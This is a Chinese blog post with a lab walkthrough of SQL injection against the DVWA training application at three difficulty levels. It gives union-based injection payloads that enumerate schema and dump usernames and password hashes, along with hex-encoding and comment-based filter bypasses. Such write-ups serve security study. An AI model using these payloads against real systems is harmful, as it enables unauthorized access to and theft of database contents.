DVWA SQL注入漏洞复现

最新推荐文章于 2024-04-21 14:08:32 发布
最新推荐文章于 2024-04-21 14:08:32 发布
阅读量334 收藏 3
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ch258563/article/details/129906634
版权

手工注入的常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

我这里以DVWA靶场为例

Low

1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入。

2.判断sql是否存在存入,以及注入的类型

1' and '1'='1

3.猜解SQL查询语句中的字段数

1' order by 2#

 1' order by 3#

从上面查询后得到的两个图可以说明,SQL语句查询的表的字段数是2

4.确定显示的位置(SQL语句查询之后的回显位置)

1' union select 1,2#

下图可以看出有2个回显

5.查询当前的数据库,以及版本

1' union select version(),database()#

6.获取数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

7.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

8.获得字段中的数据

1' union select user,password from users#

Medium

1.点击查看源码,可以看到中级加入了一些防御,不让用户输入,只提供选择(可以用burpsuit抓包来绕过),分析源码可以看到对参数使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入

2.利用bp抓包,修改数据包,绕过防御

判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入

3.猜解sql查询语句中的字段的个数,确定回显的位置

4.获取当前数据库的名称以及版本

获取当前数据库的名称以及版本
1 union select database(),version()#

5.获取数据库中的所有表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

6.获取表中的所有字段名

考虑到单引号被转义,可以利用 16 进制进行绕过

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

7.获取字段中的数据

1 union select user,password from users#

1 union select user,password from users#

High

点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,与Medium级别的代码相比,High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果

虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。

1' or 1=1 union select group_concat(user),group_concat(password) from users #

土豆儿258563
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GeoServer SQL注入漏洞(CVE-2023-25157)
0xSec
06-09 7159
GeoServer在预览图层的时候,可以对图层进行数据过滤从而渲染出指定位置的图层。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。
漏洞】熊海cms 存在sql注入 附poc
失心少年
11-26 1149
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发;熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
网络安全之SQL注入漏洞(中篇)(技术进阶)
最新发布
weixin_70911257的博客
04-21 1109
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
SQL注入漏洞:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1127
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
SQL注入漏洞漏洞挖掘与利用
Kali与编程
12-12 1375
新的注入技术的出:随着数据库技术的不断发展和漏洞利用技术的不断进步,SQL注入漏洞利用的技术也会不断发展和改变。攻击者可能会开发新的注入技术,例如,基于机器学习的注入技术、基于深度学习的注入技术等等,这些技术将更加智能和杂,可以更好地绕过检测和过滤。注入点是指通过SQL注入漏洞可控制的语句部分,攻击者可以通过注入点来执行一些SQL语句,例如,攻击者可以使用注入点来执行SELECT、UPDATE、DELETE等等操作。攻击者可能会利用云计算平台的漏洞来攻击数据库,或者利用物联网设备的漏洞来攻击应用程序。
DVWA-sql注入漏洞
qq_68238790的博客
12-04 163
SQL注入漏洞是Web层面最高位的漏洞之一。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入
Casdoor SQL注入漏洞,编号:CVE-2022-24124
╲ゞ紅桃K
08-31 2395
漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞
weixin_68999845的博客
09-21 458
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞
畅捷通CRM SQL注入漏洞
0xSec
06-13 1573
用友畅捷CRMcreate_site.php处存在SQL时间盲注,攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
中远麒麟堡垒机 SQL注入漏洞
0xSec
08-16 2223
中远麒麟堡垒机/baoleiji/api/tokens接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
SQL注入漏洞讲解
02-02
讲解SQL注入漏洞原理以及测试方法;目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还...
学习之sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这篇文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
网络安全之SQL注入漏洞(上篇)(技术进阶)
weixin_70911257的博客
04-12 1142
SQL注入SQL Injection)是一种常见的网络攻击手段,是因为应用程序对用户输入的数据验证不到位造成的。攻击者在应用程序的输入字段中插入恶意的SQL代码,在应用程序未授权的情况下执行任意的SQL语句。
SQL注入漏洞方案及代码审计
fengxioabai的博客
03-18 1020
⼀个成功的SQL注⼊攻击可以从 数据库中获取敏感 数据、修改数据库数据(插⼊/更新/删除)、执⾏数据库管理操作 (如关闭数据库管理系统)、恢 存在于数据库⽂件系统中的指定⽂件 内容,在某些情况下能对操作系统发布命令。由于⽤户的输⼊,也是SQL语句的⼀部分,所以 攻击者可以利⽤这部分可以控制的内容,注⼊⾃⼰定义的语句,改变SQL语句 执⾏逻辑,让数据库执⾏任意⾃⼰需要 的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何⾃⼰需要的数据,利⽤数据库的⼀ 些特性,可以直接 获取数据库服务器的系统权限。
网络安全:SQL 注入漏洞
xv7676的博客
05-22 468
WordPress是一个用PHP编写的免费开源内容管理系统,由于clean_query函数的校验不当,导致了可能通过插件或主题以某种方式从而触发SQL注入的情况。这已经在WordPress5.8.3中进行了修。影响版本可以追溯到3.7.37。
编写一个能够验证dvwasql注入漏洞的poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值